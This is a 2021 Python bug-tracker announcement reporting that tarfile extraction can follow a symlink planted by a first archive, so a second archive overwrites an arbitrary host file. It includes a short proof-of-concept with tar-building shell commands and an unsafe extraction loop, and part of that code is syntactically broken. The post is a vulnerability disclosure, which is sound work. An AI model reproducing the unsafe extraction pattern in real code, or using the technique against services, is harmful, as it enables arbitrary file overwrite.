[New-bugs-announce] [issue44023] "tarfile" library will lead to "write any content to any file on the host".

guangli dong report at bugs.python.org
Mon May 3 13:44:03 EDT 2021

New submission from guangli dong <leveryd at gmail.com>:

if uncompress file twice to the same dir, attacker can "write any content to any file on the host"".

poc code like below:
import tarfile

dir_name = "/tmp/anything"
file1_name = "/tmp/a.tar.gz"  # ln -sv /tmp/a test_tar/a;tar -cvf a.tar.gz test_tar/a
file2_name = "/tmp/b.tar.gz"  # echo "it is just poc" > /tmp/payload; rm -rf test_tar; cp /tmp/payload test_tar/a;tar -cvf b.tar.gz test_tar/a

def vuln_tar(tar_path):
	:param tar_path:
	import tarfile
	tar = tarfile.open(tar_path, "r:tar")
	file_names = tar.getnames()
	for file_name in file_names:
	    tar.extract(file_name, dir_name)


in this poc code, if one service uncompress tar file which is uploaded by attacker to "dir_name" twice, attacker can create "/tmp/a" and write "it is just poc" string into "/tmp/a" file.

components: Library (Lib)
files: poc.tar.gz
messages: 392827
nosy: leveryd
priority: normal
severity: normal
status: open
title: "tarfile" library will lead to "write any content to any file on the host".
type: security
versions: Python 3.7
Added file: https://bugs.python.org/file50005/poc.tar.gz

Python tracker <report at bugs.python.org>

More information about the New-bugs-announce mailing list